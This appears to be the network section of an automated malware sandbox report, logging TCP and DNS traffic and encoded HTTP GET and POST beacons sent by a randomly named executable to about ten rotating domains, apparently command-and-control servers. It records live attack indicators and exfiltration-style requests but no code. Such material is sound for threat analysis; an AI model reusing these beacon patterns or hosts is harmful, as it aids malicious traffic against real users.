                                              Sep 25, 2024 12:47:45.398036003 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:46.904784918 CEST4975680192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:46.952156067 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:47.919955015 CEST4975780192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:48.034840107 CEST8049757103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:48.034919024 CEST4975780192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:48.043497086 CEST4975780192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:48.048374891 CEST8049757103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:01.642399073 CEST8049754103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:01.644860983 CEST4975480192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:48:04.218791008 CEST8049755103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:04.218868017 CEST4975580192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:48:06.749937057 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:06.750109911 CEST4975680192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:48:09.394454956 CEST8049757103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:09.394601107 CEST4975780192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:48:09.395579100 CEST4975780192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:48:09.400418997 CEST8049757103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:48:22.502660036 CEST4975880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:22.507528067 CEST80497583.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:22.507639885 CEST4975880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:22.517416954 CEST4975880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:22.522315979 CEST80497583.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:22.967201948 CEST80497583.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:22.972850084 CEST4975880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:24.026313066 CEST4975880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:24.031222105 CEST80497583.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:25.044847965 CEST4975980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:25.049804926 CEST80497593.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:25.052984953 CEST4975980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:25.068850040 CEST4975980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:25.073782921 CEST80497593.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:25.529469013 CEST80497593.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:25.532953978 CEST4975980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:26.572823048 CEST4975980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:26.577655077 CEST80497593.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.596872091 CEST4976080192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:27.602194071 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.603025913 CEST4976080192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:27.613706112 CEST4976080192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:27.618588924 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618599892 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618614912 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618623972 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618632078 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618776083 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618801117 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618817091 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:27.618825912 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:28.066184044 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:28.066242933 CEST4976080192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:29.119674921 CEST4976080192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:29.124536991 CEST80497603.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:30.138365030 CEST4976180192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:30.181648970 CEST80497613.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:30.181718111 CEST4976180192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:30.189023972 CEST4976180192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:30.193902969 CEST80497613.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:30.640738964 CEST80497613.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:30.640836954 CEST80497613.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:30.640902996 CEST4976180192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:30.643955946 CEST4976180192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:30.650362968 CEST80497613.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:35.850855112 CEST4976280192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:35.855664015 CEST80497623.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:35.855725050 CEST4976280192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:35.869275093 CEST4976280192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:35.874115944 CEST80497623.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:37.387908936 CEST4976280192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:37.393564939 CEST80497623.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:37.393668890 CEST4976280192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:38.404162884 CEST4976380192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:38.410680056 CEST80497633.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:38.410761118 CEST4976380192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:38.423007011 CEST4976380192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:38.428410053 CEST80497633.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:39.932240963 CEST4976380192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:39.937448025 CEST80497633.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:39.937510967 CEST4976380192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:40.950762033 CEST4976480192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:40.955709934 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.956955910 CEST4976480192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:40.968885899 CEST4976480192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:40.973691940 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973720074 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973727942 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973772049 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973779917 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973948002 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973980904 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.973989964 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:40.974011898 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:41.413959026 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:41.416915894 CEST4976480192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:42.479191065 CEST4976480192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:42.484957933 CEST80497643.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:43.500891924 CEST4976580192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:43.506071091 CEST80497653.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:43.509030104 CEST4976580192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:43.515542030 CEST4976580192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:43.520816088 CEST80497653.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:43.979209900 CEST80497653.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:43.979896069 CEST80497653.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:43.979967117 CEST4976580192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:43.987943888 CEST4976580192.168.2.43.33.130.190
                                              Sep 25, 2024 12:48:43.994512081 CEST80497653.33.130.190192.168.2.4
                                              Sep 25, 2024 12:48:49.227904081 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:49.233587980 CEST804976685.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:49.236980915 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:49.248893023 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:49.253726006 CEST804976685.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:49.969575882 CEST804976685.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:49.969595909 CEST804976685.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:49.969633102 CEST804976685.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:49.969654083 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:49.969712973 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:50.760498047 CEST4976680192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:51.778803110 CEST4976780192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:51.783703089 CEST804976785.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:51.783874989 CEST4976780192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:51.792922020 CEST4976780192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:51.799454927 CEST804976785.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:52.523732901 CEST804976785.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:52.523838043 CEST804976785.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:52.523849010 CEST804976785.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:52.523895979 CEST4976780192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:53.308897018 CEST4976780192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:54.326519966 CEST4976880192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:54.333373070 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.333467960 CEST4976880192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:54.346404076 CEST4976880192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:54.355031967 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.355072975 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.355123997 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.355151892 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.355180025 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.357536077 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.357563972 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.357630014 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:54.357656956 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:55.213120937 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:55.213213921 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:55.213246107 CEST804976885.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:55.215173960 CEST4976880192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:55.855074883 CEST4976880192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:56.872631073 CEST4976980192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:56.877916098 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:56.878007889 CEST4976980192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:56.884349108 CEST4976980192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:56.889218092 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:57.629153967 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:57.629215002 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:57.629280090 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:48:57.629654884 CEST4976980192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:57.631772995 CEST4976980192.168.2.485.153.138.113
                                              Sep 25, 2024 12:48:57.636720896 CEST804976985.153.138.113192.168.2.4
                                              Sep 25, 2024 12:49:02.768492937 CEST4977080192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:02.773984909 CEST8049770104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:02.774090052 CEST4977080192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:02.783584118 CEST4977080192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:02.788729906 CEST8049770104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:03.768829107 CEST8049770104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:03.768857956 CEST8049770104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:03.768975973 CEST4977080192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:04.291657925 CEST4977080192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:05.309950113 CEST4977180192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:05.314850092 CEST8049771104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:05.315104961 CEST4977180192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:05.326937914 CEST4977180192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:05.331831932 CEST8049771104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:06.297909975 CEST8049771104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:06.298039913 CEST8049771104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:06.298093081 CEST4977180192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:06.838709116 CEST4977180192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:07.856945038 CEST4977280192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:08.098814964 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.099010944 CEST4977280192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:08.114710093 CEST4977280192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:08.119811058 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.119832993 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.119936943 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.119954109 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.119965076 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.119978905 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.120065928 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.120074034 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:08.120132923 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:09.088731050 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:09.088912010 CEST8049772104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:09.089476109 CEST4977280192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:09.619788885 CEST4977280192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:10.919738054 CEST4977380192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:10.924806118 CEST8049773104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:10.927767992 CEST4977380192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:10.933710098 CEST4977380192.168.2.4104.21.11.31
                                              Sep 25, 2024 12:49:10.938589096 CEST8049773104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:11.930526018 CEST8049773104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:11.931173086 CEST8049773104.21.11.31192.168.2.4
                                              Sep 25, 2024 12:49:11.931245089 CEST4977380192.168.2.4104.21.11.31

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 12:46:29.240736961 CEST6489453192.168.2.41.1.1.1
                                              Sep 25, 2024 12:46:29.290086985 CEST53648941.1.1.1192.168.2.4
                                              Sep 25, 2024 12:46:45.061227083 CEST6401753192.168.2.41.1.1.1
                                              Sep 25, 2024 12:46:46.027901888 CEST53640171.1.1.1192.168.2.4
                                              Sep 25, 2024 12:46:59.967919111 CEST6122553192.168.2.41.1.1.1
                                              Sep 25, 2024 12:47:00.235361099 CEST53612251.1.1.1192.168.2.4
                                              Sep 25, 2024 12:47:13.358769894 CEST5637853192.168.2.41.1.1.1
                                              Sep 25, 2024 12:47:13.372443914 CEST53563781.1.1.1192.168.2.4
                                              Sep 25, 2024 12:47:26.543175936 CEST5253053192.168.2.41.1.1.1
                                              Sep 25, 2024 12:47:26.722474098 CEST53525301.1.1.1192.168.2.4
                                              Sep 25, 2024 12:47:40.046143055 CEST5880253192.168.2.41.1.1.1
                                              Sep 25, 2024 12:47:40.263849020 CEST53588021.1.1.1192.168.2.4
                                              Sep 25, 2024 12:48:14.410517931 CEST5972553192.168.2.41.1.1.1
                                              Sep 25, 2024 12:48:14.420882940 CEST53597251.1.1.1192.168.2.4
                                              Sep 25, 2024 12:48:22.482840061 CEST5568453192.168.2.41.1.1.1
                                              Sep 25, 2024 12:48:22.500354052 CEST53556841.1.1.1192.168.2.4
                                              Sep 25, 2024 12:48:35.656874895 CEST5735053192.168.2.41.1.1.1
                                              Sep 25, 2024 12:48:35.847975016 CEST53573501.1.1.1192.168.2.4
                                              Sep 25, 2024 12:48:48.999926090 CEST5876453192.168.2.41.1.1.1
                                              Sep 25, 2024 12:48:49.221343040 CEST53587641.1.1.1192.168.2.4
                                              Sep 25, 2024 12:49:02.639827013 CEST6529053192.168.2.41.1.1.1
                                              Sep 25, 2024 12:49:02.766263962 CEST53652901.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 25, 2024 12:46:29.240736961 CEST192.168.2.41.1.1.10x2670Standard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:46:45.061227083 CEST192.168.2.41.1.1.10xb222Standard query (0)www.ultraleap.netA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:46:59.967919111 CEST192.168.2.41.1.1.10xae14Standard query (0)www.dalong.siteA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:13.358769894 CEST192.168.2.41.1.1.10x3765Standard query (0)www.mgeducacaopro.onlineA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:26.543175936 CEST192.168.2.41.1.1.10xde8bStandard query (0)www.heldhold.xyzA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:40.046143055 CEST192.168.2.41.1.1.10x89ffStandard query (0)www.63582.photoA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:14.410517931 CEST192.168.2.41.1.1.10xeabfStandard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:22.482840061 CEST192.168.2.41.1.1.10x3d0cStandard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:35.656874895 CEST192.168.2.41.1.1.10x43baStandard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:48.999926090 CEST192.168.2.41.1.1.10xcf90Standard query (0)www.mfgarage.netA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:49:02.639827013 CEST192.168.2.41.1.1.10x8ccStandard query (0)www.b5x7vk.agencyA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 25, 2024 12:46:29.290086985 CEST1.1.1.1192.168.2.40x2670No error (0)www.2bhp.com81.88.63.46A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:46:46.027901888 CEST1.1.1.1192.168.2.40xb222No error (0)www.ultraleap.netwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:46:46.027901888 CEST1.1.1.1192.168.2.40xb222No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:00.235361099 CEST1.1.1.1192.168.2.40xae14No error (0)www.dalong.sitedalong.siteCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:47:00.235361099 CEST1.1.1.1192.168.2.40xae14No error (0)dalong.site172.96.187.60A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:13.372443914 CEST1.1.1.1192.168.2.40x3765No error (0)www.mgeducacaopro.onlinemgeducacaopro.onlineCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:47:13.372443914 CEST1.1.1.1192.168.2.40x3765No error (0)mgeducacaopro.online3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:13.372443914 CEST1.1.1.1192.168.2.40x3765No error (0)mgeducacaopro.online15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:26.722474098 CEST1.1.1.1192.168.2.40xde8bNo error (0)www.heldhold.xyz67.223.117.189A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:47:40.263849020 CEST1.1.1.1192.168.2.40x89ffNo error (0)www.63582.photo6ybpt9er.as66588.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:47:40.263849020 CEST1.1.1.1192.168.2.40x89ffNo error (0)6ybpt9er.as66588.comazkwupgf.as66588.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:47:40.263849020 CEST1.1.1.1192.168.2.40x89ffNo error (0)azkwupgf.as66588.com103.248.137.209A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:14.420882940 CEST1.1.1.1192.168.2.40xeabfName error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:22.500354052 CEST1.1.1.1192.168.2.40x3d0cNo error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:48:22.500354052 CEST1.1.1.1192.168.2.40x3d0cNo error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:22.500354052 CEST1.1.1.1192.168.2.40x3d0cNo error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:35.847975016 CEST1.1.1.1192.168.2.40x43baNo error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 12:48:35.847975016 CEST1.1.1.1192.168.2.40x43baNo error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:35.847975016 CEST1.1.1.1192.168.2.40x43baNo error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:48:49.221343040 CEST1.1.1.1192.168.2.40xcf90No error (0)www.mfgarage.net85.153.138.113A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:49:02.766263962 CEST1.1.1.1192.168.2.40x8ccNo error (0)www.b5x7vk.agency104.21.11.31A (IP address)IN (0x0001)false
                                              Sep 25, 2024 12:49:02.766263962 CEST1.1.1.1192.168.2.40x8ccNo error (0)www.b5x7vk.agency172.67.165.25A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.2bhp.com
                                              • www.ultraleap.net
                                              • www.dalong.site
                                              • www.mgeducacaopro.online
                                              • www.heldhold.xyz
                                              • www.63582.photo
                                              • www.asiapartnars.online
                                              • www.linkwave.cloud
                                              • www.mfgarage.net
                                              • www.b5x7vk.agency

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.44973681.88.63.46803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:46:29.308563948 CEST504OUTGET /a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.2bhp.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:46:29.988576889 CEST367INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:46:29 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449737217.70.184.50803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:46:46.048444986 CEST769OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d
                                              Data Ascii: PR_xXrA=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
